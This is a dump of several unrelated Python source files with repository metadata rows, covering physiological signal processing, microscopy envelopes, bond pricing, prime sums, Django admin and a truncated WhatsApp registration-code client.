  def test_SoftwareRelease_available_SetupResource_CancelledState(self):
    """
    Check that calling SoftwareRelease.available works in
    cancelled state with the setup resource
    """
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_purchase_packing_list + '\
      LoginDefaultUser \
      CancelPurchasePackingList \
      Tic \
      Logout \
      SlapLoginCurrentComputer \
      CheckNotFoundSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckSoftwareReleaseUnavailableForRequest \
      CheckCancelledPurchasePackingList \
      Logout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_CleanupResource_CancelledState(self):
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
      LoginDefaultUser \
      CancelPurchasePackingList \
      Tic \
      Logout \
      SlapLoginCurrentComputer \
      CheckNotFoundSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_SetupResource_StartedState(self):
    """
    Check that calling SoftwareRelease.available works in
    started state with the setup resource
    """
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_purchase_packing_list + '\
      LoginDefaultUser \
      StartPurchasePackingList \
      Tic \
      CheckSoftwareReleaseUnavailableForRequest \
      Logout \
      SlapLoginCurrentComputer \
      CheckSuccessSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckStoppedPurchasePackingList \
      CheckSoftwareReleaseAvailableForRequest \
      CheckSoftwareReleaseInPublicTable \
      Logout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_CleanupResource_StartedState(self):
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
      LoginDefaultUser \
      StartPurchasePackingList \
      Tic \
      Logout \
      SlapLoginCurrentComputer \
      CheckNotFoundSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_SetupResource_StoppedState(self):
    """
    Check that calling SoftwareRelease.available works in
    stopped state with the setup resource
    """
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_purchase_packing_list + '\
      LoginDefaultUser \
      StartPurchasePackingList \
      StopPurchasePackingList \
      Tic \
      CheckSoftwareReleaseAvailableForRequest \
      Logout \
      SlapLoginCurrentComputer \
      CheckNotFoundSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckStoppedPurchasePackingList \
      CheckSoftwareReleaseAvailableForRequest \
      Logout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_CleanupResource_StoppedState(self):
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
      LoginDefaultUser \
      StartPurchasePackingList \
      Tic \
      StopPurchasePackingList \
      Tic \
      Logout \
      SlapLoginCurrentComputer \
      CheckNotFoundSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_SetupResource_DeliveredState(self):
    """
    Check that calling SoftwareRelease.available works in
    delivered state with the setup resource
    """
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_purchase_packing_list + '\
      LoginDefaultUser \
      StartPurchasePackingList \
      StopPurchasePackingList \
      DeliverPurchasePackingList \
      Tic \
      CheckSoftwareReleaseUnavailableForRequest \
      Logout \
      SlapLoginCurrentComputer \
      CheckNotFoundSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckDeliveredPurchasePackingList \
      CheckSoftwareReleaseUnavailableForRequest \
      Logout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_CleanupResource_DeliveredState(self):
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
      LoginDefaultUser \
      StartPurchasePackingList \
      Tic \
      StopPurchasePackingList \
      Tic \
      DeliverPurchasePackingList \
      Tic \
      Logout \
      SlapLoginCurrentComputer \
      CheckNotFoundSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_twoPurchasePackingList(self):
    """
    Check that calling SoftwareRelease.available uses the latest purchase packing
    list for calculation
    """
    sequence_list = SequenceList()
    sequence_string = self.prepare_two_purchase_packing_list + '\
      LoginDefaultUser \
      StepPurchasePackingListBStartDateAfterPurchasePackingListA \
      Tic \
      Logout \
      SlapLoginCurrentComputer \
      CheckSuccessSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckStoppedPurchasePackingListB \
      Logout\
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_string = self.prepare_two_purchase_packing_list + '\
      LoginDefaultUser \
      StepPurchasePackingListBStartDateBeforePurchasePackingListA \
      Tic \
      Logout \
      SlapLoginCurrentComputer \
      CheckSuccessSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckStoppedPurchasePackingListB \
      Logout\
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
def test_suite():
  """Assemble and return the unittest suite for this module."""
  cases = unittest.TestSuite()
  cases.addTest(unittest.makeSuite(TestVifibSlapSoftwareReleaseAvailable))
  return cases
|
UTF-8
|
Python
| false | false | 2,012 |
14,302,241,132,421 |
ba5e8db85ae6b7dbc64d5f75009bccb175e112e3
|
65c4b7eae31f0f7f1d114f327c7d8abd395968b3
|
/eelbrain/psyphys/datasets_op_physio.py
|
7ee17194dacde08dd0a1978de36987ad8cb9afde
|
[] |
no_license
|
teonbrooks/Eelbrain
|
https://github.com/teonbrooks/Eelbrain
|
191bca0d5310a0b4b0ef7cd1ff5a4841578253f5
|
49019cd2e2e188c0f190477ea2f9054ade7b9cf9
|
refs/heads/master
| 2017-12-02T02:11:40.197285 | 2013-03-04T21:05:18 | 2013-03-05T16:23:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
op.physio
=========
Operations for psychophysiology: heartbeat- and skin conductance response (SCR)
extraction.
"""
import logging
import numpy as np
import scipy as sp
from matplotlib import mlab
from matplotlib import pyplot as P
from datasets_base import Derived_Event_Dataset
import datasets_mixins as mixins
import param
class HeartBeat(Derived_Event_Dataset, mixins.Reject):
    """Extract heart beats from a 1-d physiological channel.

    Produces one event per detected beat with the variables: beat time,
    inter-beat interval (IBI, in seconds) and heart rate (beats/min).
    Rejected time windows (mixins.Reject) are bridged by interpolating
    beats when the gap is long enough to have swallowed real beats.
    """

    def _addparams_(self, p):
        """Declare the user-tunable beat-detection parameters."""
        p.minIBI = param.Param(default=.1, desc="minimum IBI (in sec)")
        p.maxIBI = param.Param(default=1.5, desc="maximum IBI (in sec)")
        # Fixed typo in the description text ("alse" -> "False").
        p.threshold = param.Param(default=95, desc="Threshold for beat "
                                  "detection (only applies if advanced==False)")
        p.advanced = param.Param(default=True, dtype=bool,
                                 desc=" include minIBI etc. in calc")

    def _validate_input_properties_(self, properties):
        """Accept only 1-dimensional input data."""
        if properties['ndim'] != 1:
            raise ValueError("ibi needs ndim=1 input")
        else:
            return True

    def _create_varlist_(self):
        """Variables attached to each beat event: time, IBI and Rate."""
        e = self.experiment
        varlist = [e.variables.get('time'),
                   e.variables.get('IBI'),
                   e.variables.get('Rate')]
        return varlist

    def _derive_segment_data_(self, segment, preview=False):
        """Detect beats in one segment.

        Returns an (n_beats, 3) array with columns [time, IBI, rate].
        Raises NotImplementedError when the 'advanced' parameter is False
        (the simple threshold path was never implemented).
        """
        source = segment._p_attr['source']
        samplingrate = self.properties['samplingrate']
        threshold = self.compiled['threshold']
        minIBI = self.compiled['minIBI']
        maxIBI = self.compiled['maxIBI']
        advanced = self.compiled['advanced']
        t = source.t

        # Prepare data: emphasize sharp deflections with the absolute second
        # difference (padded to keep the original length), blank out rejected
        # stretches, then turn the percentile parameter into an absolute
        # threshold on the processed signal.
        f0 = source.data[:, 0]
        f0 = np.hstack([[0], np.abs(np.diff(f0, n=2)), [0]])
        f0 = self.reject_flatten(segment, f0, t)
        threshold = sp.stats.scoreatpercentile(f0, threshold)

        # Beat extraction.
        beats = []
        f0_len = len(f0)
        if advanced:
            # IBI limits converted from seconds to samples.
            minstep = int(minIBI * samplingrate)
            window = int(maxIBI * samplingrate)
            last = -minstep
            while last < f0_len - (minstep + window):
                # Window in which the next beat must occur.
                start = last + minstep
                end = start + window
                dtemp = f0[start:end]
                # Maximum inside the window is the beat candidate.
                new = np.argmax(dtemp)
                if threshold:
                    # Prefer an earlier supra-threshold peak if minstep allows.
                    while new > minstep:
                        if np.max(dtemp[0:new - minstep]) > threshold:
                            new = np.argmax(dtemp[0:new - minstep])
                        else:
                            break
                next = last + minstep + new
                beats.append(t[next])
                last = next
            beats = np.array(beats)

            # Interpolate where the rejected stretch is longer than minIBI.
            reject_list = self.reject_list_for_segment(segment)
            logging.debug("REJECT: %s" % reject_list)
            for t1, t2 in reject_list:
                if t2 - t1 > minIBI:
                    i1 = np.sum(beats < t1) - 1  # the last beat before t1
                    i2 = np.sum(beats < t2)      # the first beat after t2
                    ibi = beats[i2] - beats[i1]
                    ibi1 = beats[i1] - beats[i1 - 1]
                    ibi2 = beats[i2 + 1] - beats[i2]
                    ibi_mean = np.mean([ibi1, ibi2])
                    logging.debug("t=%s, ibi=%s, mean-ibi=%s" % (t1, ibi, ibi_mean))
                    if ibi > 1.5 * ibi_mean:
                        # Gap spans several beats: fill it with evenly spaced
                        # interpolated beats.
                        # Bug fix: round() returns a float (Python 2.x), which
                        # range() rejects with a TypeError -- cast to int.
                        n = int(round(ibi / ibi_mean))
                        ibi_new = ibi / n
                        beats = np.hstack([beats[:i1 + 1],
                                           [(beats[i1] + i * ibi_new) for i in range(1, n)],
                                           beats[i2:]])
                    elif i2 != i1 + 1:
                        # Gap contains only spurious beats: drop them.
                        beats = np.hstack([beats[:i1 + 1], beats[i2:]])
                        i2 = i1 + 1

            # Derive per-beat IBI; duplicate the first interval so that the
            # first beat also carries an IBI value.
            ibi = beats[1:] - beats[:-1]
            ibi = np.hstack([[ibi[0]], ibi])
            # Heart rate in beats per minute.
            rate = 60 / ibi
            beats = np.hstack([beats[:, None], ibi[:, None], rate[:, None]])
        else:
            # Simple (non-advanced) threshold detection was never implemented.
            raise NotImplementedError
        return beats
class SCR(Derived_Event_Dataset, mixins.Reject):
    """Extract skin conductance responses (SCRs) from a 1-d channel.

    Each event carries the variables 'time' (SCR onset) and 'magnitude'
    (peak-to-peak amplitude of the first derivative over the response).
    """

    def _addparams_(self, p):
        """Declare smoothing windows and scoring thresholds."""
        p.smooth1 = param.Window(default=(4, 150), #del_segs=True,
                                 desc="Smoothing before taking "
                                 "the first derivative")
        p.smooth2 = param.Window(default=(0, 150), #del_segs=True,
                                 desc="Smoothing of the first derivative "
                                 "before taking the second derivative")
        p.smooth3 = param.Window(default=(4, 150), #del_segs=True,
                                 desc="Smoothing of the second deri"
                                 "vative before finding 0-crossings.")
        desc = "Threshold for scoring SCRs (p-p)"
        p.threshold = param.Param(default=.005, desc=desc)
        desc = ("Threshold for splitting a SCR into two SCRs (in the second "
                "derivative)")
        p.split_threshold = param.Param(default=0, desc=desc)

    def _create_varlist_(self):
        """Variables attached to each SCR event: onset time and magnitude."""
        e = self.experiment
        varlist = [e.variables.get('time'),
                   e.variables.get('magnitude')]
        return varlist

    def _derive_segment_data_(self, segment, preview=False):
        """Detect SCRs in one segment; returns an (n, 2) array [time, p-p].

        With preview=True the intermediate signals are plotted and
        NotImplementedError is raised instead of returning data.
        """
        # collect processing parameters
        source = segment._p_attr['source']
        sm1 = self.compiled['smooth1']
        sm2 = self.compiled['smooth2']
        sm3 = self.compiled['smooth3']
        split_threshold = self.compiled['split_threshold']
        threshold = self.compiled['threshold']
        t = source.t
        ## get skin conductance (f0)
        f0 = source.data[:,0]
        if sm1 != None:
            f0 = np.convolve(f0, sm1, 'same')
        # find the first derivative (discrete difference)
        d1 = np.diff(f0)
        if sm2 != None:
            d1 = np.convolve(d1, sm2, 'same')
        # find zero crossings of the first derivative:
        # an SCR rises from a below->above crossing to the next above->below.
        r_start = mlab.cross_from_below(d1, 0)
        r_end = mlab.cross_from_above(d1, 0)
        # If the signal starts mid-response, drop the unmatched first end.
        if r_end[0] < r_start[0]:
            r_end = r_end[1:]
        # remove SCRs in rejected TWs
        if self.reject_has_segment(segment):
            sr = float(segment.samplingrate)
            i = self.reject_check(segment, r_start, sr=sr)
            r_start = r_start[i]
            r_end = r_end[i]
            # NOTE(review): the result of this second reject_check is never
            # used -- presumably r_end was meant to be filtered with it;
            # confirm intended behavior before changing.
            i = self.reject_check(segment, r_end, sr=sr)
        # find the second derivative
        d2 = np.diff(d1)
        if sm3 != None:
            d2 = np.convolve(d2, sm3, 'same')
        if preview:
            # Plot f0 with the (normalized) first and second derivatives
            # overlaid; edges are trimmed to avoid convolution artifacts.
            P.figure()
            P.plot(t, f0)
            nf = max(abs(f0))
            d1p = d1[1000:-1000]
            d2p = d2[1000:-1000]
            tp = t[1000:-1000]
            P.plot(tp, nf/2 + (d1p / max(abs(d1p))) * nf)
            P.plot(tp, nf/2 + (d2p / max(abs(d2p))) * nf)
            P.axhline(nf/2)
        # collect SCRs with positive p-p values
        SCRs = []
        for start, end in zip(r_start, r_end):
            # find intermediate separation points (zero crossings of d2
            # within the response; offset back into full-signal indices)
            sep = mlab.cross_from_below(d2[start:end], 0) + start + 1
            # remove SCRs in rejected TWs
            if self.reject_has_segment(segment):
                i = self.reject_check(segment, sep, sr=sr, tstart=start/sr)
                sep = sep[i]
            # remove separations that do not reach threshold
            if split_threshold:
                sep = list(sep)
                idxs = [start] + sep + [end]
                # Walk backwards so pops don't shift pending indices.
                for i in xrange(len(idxs) - 2, 0, -1):
                    i0 = idxs[i]
                    i1 = idxs[i+1]
                    if np.max(d2[i0:i1]) < split_threshold:
                        sep.pop(i-1)
            # Score each sub-response: p-p is the summed first derivative
            # (net conductance change) over the interval.
            i = start
            for j in np.hstack((sep, [end])):
                pp = np.sum(d1[i:j])
                if pp > threshold:
                    SCRs.append([t[i], pp])
                i = j
        if preview: # provide preview data to the viewer
            raise NotImplementedError
        else:
            return np.array(SCRs)
|
UTF-8
|
Python
| false | false | 2,013 |
18,382,460,027,526 |
8acc2c5256db16e189b039909a37a6187f409d68
|
d4062c88e8c6891352c65e0d63975f0f8a77980f
|
/TrakEM2/generate_minimally_enclosing_envelopes.py
|
dd72e2f9f751e0087d47e30af8063b48bb848c7b
|
[] |
no_license
|
acardona/Fiji-TrakEM2-scripts
|
https://github.com/acardona/Fiji-TrakEM2-scripts
|
a602c8cba2839651d4763fe6fd7f0cd11711c396
|
29e809ea9b8bf9e94000d3e3e9e636421c64cfc5
|
refs/heads/master
| 2021-01-19T10:59:28.657123 | 2011-11-29T21:48:16 | 2011-11-29T21:48:16 | 786,563 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# To show the envelope of a single lineage, do:
# regex = "DPLm2" # the name of the lineage
# To create envelopes for all lineages, do:
# regex = None
# ... and then don't show the plots (all will be together):
# show_3D = False
# ASSUMES pipes have the same exact name across all TrakEM2 projects.
# The 'name' is the title of the pipe node in the Project Tree
# and any of its parent nodes, chained. So if you want all DPM lineages
# and these are grouped in a DPM lineage group, then use "DPM".
from ini.trakem2 import Project
from java.awt import Color
from java.io import File
projects = [p for p in Project.getProjects()]
# Add more colors if you have more than 6 projects open
colors = [Color.white, Color.yellow, Color.magenta, Color.green, Color.blue, Color.orange]
sources_color_table = {}
for project, color in zip(projects, colors):
sources_color_table[project] = color
# 1. The project to use as reference--others are compared to it.
reference_project = projects[0]
# 2. The regular expression to match. Only pipes whose name matches it
# will be analyzed. If null, all are matched.
regex = None # For a single one, put its name: "DPMm2"
# 3. A list of text strings containing regular expressions.
# Any pipe whose name matches any will be ignored.
ignore = ["unknown.*", "poorly.*", "MB.*", "peduncle.*", "TR.*"]
# 4. Whether to show the dialog to adjust parameters manually
show_dialog = True
# 5. Whether to generate the variability plots
generate_plots = True
# 6. Whether to show the generated plots in windows
show_plots = False # They will be stored in files.
# 7. The directory in which to save the plot .png files.
plots_dir = System.getProperty("user.home") + "/Desktop/variability-plots/"
# 8. Whether to show the 3D window
show_3D = True
# 9. Whether to show the average pipe in 3D
show_condensed_3D = True
# 10. Wether to show the original pipes in 3D
show_sources_3D = True
# 11. The table of Project instance vs color to use for that project
# sources_color_table # Already defined above
# 12. Whether to show the enclosing envelope
show_envelope_3D = True
# 13. The transparency of the envelope
envelope_alpha = 0.4
# 14. The resampling for the envelope
envelope_delta = 1
# 15. The type of envelope:
# 1 = 2 std Dev
# 2 = 3 std Dev
# 3 = average distance
# 4 = maximum distance
envelope_type = 3
# 16. Whether to show the axes in 3D
show_axes_3D = True
# 17. Whether to use a heat map for the envelope
use_heatmap = False
# 18. Store the condensed pipes in this table if not null
condensed = None
# 19. The list of projects to consider
# projects # Already defined above
# Ensure plots directory exists
if plots_dir:
f = File(plots_dir)
if not f.exists():
print "Created plots directory:", f.mkdirs()
Compare.variabilityAnalysis(reference_project,
regex,
ignore,
show_dialog,
generate_plots,
show_plots,
plots_dir,
show_3D,
show_condensed_3D,
show_sources_3D,
sources_color_table,
show_envelope_3D,
envelope_alpha,
envelope_delta,
envelope_type,
show_axes_3D,
use_heatmap,
condensed,
projects)
|
UTF-8
|
Python
| false | false | 2,011 |
6,150,393,170,340 |
6b26e3b680dc33a06b34290729b6b7be52b9009e
|
48a4b88b609d30657477bbd90811dfc1ae4a4942
|
/find_unicode.py
|
79b518f96de4dcdbfeb97d5221ceedd37eb3285f
|
[
"GPL-3.0-or-later"
] |
non_permissive
|
averagesecurityguy/artgen
|
https://github.com/averagesecurityguy/artgen
|
cf210751722ea8eb72b1fd02a8e836722d92a821
|
264b541d78b8fe81598687167205a6551ec051a1
|
refs/heads/master
| 2016-09-15T19:11:20.527439 | 2014-04-12T22:49:51 | 2014-04-12T22:49:51 | 9,070,179 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null |
text = ''
count = 1
for line in open('source_text.txt'):
line = line.strip()
char = 0
for c in line:
char += 1
try:
text += c.encode('ascii')
except:
print count, char
count += 1
|
UTF-8
|
Python
| false | false | 2,014 |
13,297,218,770,333 |
a485d5f86324aec565d58daa7c6be6e80a931d87
|
28954beb66c6bf7ee33f02e1a91b370082716013
|
/env/lib/python2.6/sre_constants.py
|
84580d6703e765014228cc56f0ea996d19f617b3
|
[] |
no_license
|
henyouqian/dms
|
https://github.com/henyouqian/dms
|
64e34517b3901b9eb5ae414d59598f4381c44bf8
|
cb61d4df3de17affadb977d4bdec7a8f8ba5d113
|
refs/heads/master
| 2016-09-05T16:53:13.012257 | 2012-07-07T19:03:12 | 2012-07-07T19:03:12 | 2,625,259 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
/opt/lib/python2.6/sre_constants.py
|
UTF-8
|
Python
| false | false | 2,012 |
2,817,498,574,163 |
828b5fab4a242af7dcdb8b6d437f0cd41b79e01f
|
939afaa60a0c991a92de52256fe633a3f83cd39c
|
/prob10.py
|
4e4982f54a60a18918ab5463f7b010366b9980e5
|
[] |
no_license
|
Jelloeater/ProjectEuler
|
https://github.com/Jelloeater/ProjectEuler
|
e600e3d3f135b9706a2726ff7a7383760672edad
|
e119771d8762dff4c51aa5e7ee2a61f6c27f38d8
|
refs/heads/master
| 2020-06-05T08:48:26.217586 | 2014-06-09T23:29:53 | 2014-06-09T23:29:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__author__ = 'Jesse'
# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.
#
# Find the sum of all the primes below two million.
# 142913828921
import math
def prime(x):
    """Return True if x is a prime number, False otherwise.

    Bug fixes versus the original:
    - every even number (including 2) fell through and returned None, so
      2 was never counted as prime;
    - x == 1 returned True (empty trial-division range), so 1 was
      wrongly counted as prime.
    Together these made the Euler #10 sum off by one.
    """
    if x < 2:
        return False
    if x == 2:
        return True
    if x % 2 == 0:
        return False
    # Trial division by odd candidates up to sqrt(x), inclusive.
    for numToCheck in range(3, int(math.sqrt(x)) + 1, 2):
        if x % numToCheck == 0:
            return False
    return True
def generateList(limit):
    """Collect every number below ``limit`` accepted by prime(), echoing
    a running "<count> - <number>" progress line for each one found."""
    found = []
    for candidate in range(1, limit):
        if prime(candidate):
            found.append(candidate)
            print(str(len(found)) + " - " + str(candidate))
    return found
# Sum all primes below two million and print the result.
numberList = generateList(2000000)
x = sum(numberList)
print("Answer")
print(x)
|
UTF-8
|
Python
| false | false | 2,014 |
4,896,262,730,910 |
c985206ad5f364222306fe5aaac01b293ddca9d4
|
01766a6c51b6be326b6186e2e160269ea2ae6ea7
|
/FixedIncome/bond.py
|
1947b95dd919ec8c56c9e675133787b51df396d6
|
[] |
no_license
|
dhalik/fpl
|
https://github.com/dhalik/fpl
|
371ec5032985acebbf9f9ba54910be6e9a915444
|
6bd48218605c6fdb874d7f3e14de11d5f06b80aa
|
refs/heads/master
| 2020-06-07T18:39:30.603401 | 2014-08-04T00:01:44 | 2014-08-04T00:01:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from __future__ import division
from numpy import linspace
class Bond:
    """A plain fixed-coupon bond: annual coupons plus face value at maturity."""

    def __init__(self, faceValue, coupon, maturity):
        """
        @param faceValue - The face value of the bond
        @param coupon - The coupon rate on the bond
        @param maturity - The number of years until maturity of the bond
        """
        self.faceValue = faceValue
        self.couponRate = coupon
        # Cash amount paid each period.
        self.coupon = self.couponRate * faceValue
        self.maturity = maturity

    def price(self, rate):
        """
        Present value of the bond at a given market rate.

        @param rate - The market rate to price the bond.
        @return - The price of a bond
        """
        # Discount factor over the full life of the bond (computed once).
        discount = (1 + rate) ** self.maturity
        # PV of the coupon annuity plus PV of the face value.
        annuity = self.coupon / rate * (1 - 1 / discount)
        redemption = self.faceValue / discount
        return annuity + redemption
def main():
bond = Bond(1000, 0.08, 10)
template = "For rate {}, price is {}"
for r in xrange(1, 13):
print template.format(rate=r/100, price=bond.price(r/100))
if __name__ == "__main__":
main()
|
UTF-8
|
Python
| false | false | 2,014 |
17,145,509,462,422 |
1d9ae66aa15146dc2df8ca8c50a2dafc4a44515d
|
c861188b109d0d16738dab566e0d3d18a721edb6
|
/gp/literal.py
|
ab42f8557f055088792e63884cacd26ef349a123
|
[
"WTFPL"
] |
permissive
|
satusuuronen/pythai
|
https://github.com/satusuuronen/pythai
|
8a7585ca6c864403e9851dbe97867c02b0270475
|
80be77118b7359fe15ffe6374feffd1e3afb464c
|
refs/heads/master
| 2021-01-20T23:27:19.459542 | 2013-01-31T08:15:27 | 2013-01-31T08:15:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
@project: Pythai - Artificial Intellegence Project with Python
@package: Genetic Programming
@author: Timo Ruokonen (timoruokonen)
"""
import random
class literal:
'''
Represents a literal in the code. Literals have a type and value.
Example literals: 1, 0.57, "Kalja"
'''
registered_literals = list()
@staticmethod
def register(new_literal):
'''
Static method for registering a new literal.
Parameters:
new_literal - Literals value and type.
'''
literal.registered_literals.append(new_literal)
print "Registered literal: " + str(new_literal)
@staticmethod
def generate(typeof):
'''
Static method for generating a literal instance with given type. The new literal
instance is selected randomly from the registered literals that have the given
type.
Parameters:
typeof - Type of the literal to be created.
'''
while(True):
lit = literal.registered_literals[random.randrange(len(literal.registered_literals))]
#print "Comparing: " + str(type(lit)) + " to " + str(typeof)
if (type(lit) == typeof):
break
new_literal = literal()
new_literal.literal = lit
return new_literal
def to_s(self):
'''Returns the literal as string (code). '''
if (type(self.literal) == str):
return '"' + self.literal + '"'
else:
return str(self.literal)
|
UTF-8
|
Python
| false | false | 2,013 |
12,146,167,555,145 |
1a6e661da1031bae302159a6d9a55ee7dba2b7c6
|
cd96a078f3767b82a07aa5d64b58797e2eb79fa8
|
/pgweb/lists/admin.py
|
3027b3327afdf938d6a3ebbb37cdfae9cbaa0c7e
|
[
"BSD-3-Clause",
"PostgreSQL"
] |
permissive
|
df7cb/pgweb
|
https://github.com/df7cb/pgweb
|
ee5dca41f1e1152188b4a57531eb2fa25b4315eb
|
bf6e7a81c0a5f329ffd2f7b3e50c4c7c68735ffc
|
refs/heads/master
| 2021-10-11T05:09:31.518018 | 2014-03-28T18:18:42 | 2014-03-28T18:21:23 | 14,396,652 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.contrib import admin
from models import MailingList, MailingListGroup
# Register the mailing-list models with the Django admin site using the
# default ModelAdmin options (group first, then the lists themselves).
for model in (MailingListGroup, MailingList):
    admin.site.register(model)
|
UTF-8
|
Python
| false | false | 2,014 |
11,862,699,708,324 |
41d84052b5b94e143d030e1a4f4a38074f0ccf1f
|
a71a99933155e4fb175830544185fd28c7e5e5ca
|
/Yowsup/Registration/v2/coderequest.py
|
d81419a9cf87b049122c07ed77d5279f5c4c9706
|
[
"WTFPL"
] |
permissive
|
widnyana/noisegate-bot
|
https://github.com/widnyana/noisegate-bot
|
7ca3eb9c929871927e45bd836c0cb9be7b64041a
|
6b24fcf552d8b6c4f72aec0042edce87a7dc6d69
|
refs/heads/master
| 2015-08-14T12:17:46.778786 | 2014-11-06T21:05:35 | 2014-11-06T21:05:35 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Copyright (c) <2012> Tarek Galal <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR
A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
from Yowsup.Common.Http.warequest import WARequest
from Yowsup.Common.Http.waresponseparser import JSONResponseParser
from Yowsup.Common.constants import Constants
from Yowsup.Common.utilities import Utilities
import os
class WACodeRequest(WARequest):
    """Request a registration code from the WhatsApp v2 registration
    endpoint (v.whatsapp.net/v2/code), by SMS or voice call.

    On a failed response caused by a stale token, send() fetches a fresh
    token from Constants.tokenSource, retries once, and persists the new
    token when the retry succeeds.
    """

    def __init__(self, cc, p_in, idx, method="sms"):
        """Build the request.

        cc     -- country code
        p_in   -- phone number (without country code)
        idx    -- device/request identifier sent as the "id" parameter
        method -- delivery method, "sms" (default) or voice
        """
        super(WACodeRequest, self).__init__()
        self.p_in = p_in  # number
        self.addParam("cc", cc)
        self.addParam("in", p_in)
        self.addParam("lc", "US")
        self.addParam("lg", "en")
        self.addParam("mcc", "000")
        self.addParam("mnc", "000")
        self.addParam("method", method)
        self.addParam("id", idx)
        # Prefer a locally cached token; fall back to the built-in one.
        self.currentToken = Utilities.readToken()
        if self.currentToken:
            print("Read token from %s " %
                  os.path.expanduser(Constants.tokenStorage))
        else:
            self.currentToken = Constants.tokenData
        self.addParam("token", self.getToken(p_in, self.currentToken["t"]))
        self.url = "v.whatsapp.net/v2/code"
        # Response fields to extract from the JSON reply.
        self.pvars = ["status", "reason", "length", "method", "retry_after", "code", "param"] +\
                     ["login", "pw", "type", "expiration", "kind",
                      "price", "cost", "currency", "price_expiration"]
        self.setParser(JSONResponseParser())

    def send(self, parser=None):
        """Send the request; on token-related failure, fetch a new token,
        retry once, and persist the token if the retry succeeds.

        Returns the parsed response dict (or whatever the parser yields).
        """
        res = super(WACodeRequest, self).send(parser)
        # attempt recovery by fetching new token
        if res:
            if res["status"] == "fail":
                if res["reason"] in ("old_version", "bad_token") and Utilities.tokenCacheEnabled:
                    print("Failed, reason: %s. Checking for a new token.." %
                          res["reason"])
                    # Fetch token metadata from the configured token source.
                    res = WARequest.sendRequest(
                        Constants.tokenSource[0], 80, Constants.tokenSource[1], {}, {})
                    if res:
                        tokenData = res.read()
                        pvars = ["v", "r", "u", "t", "d"]
                        jParser = JSONResponseParser()
                        parsed = jParser.parse(tokenData.decode(), pvars)
                        # Retry only when any field differs from the token
                        # we already tried.
                        if(
                            parsed["v"] != self.currentToken["v"]
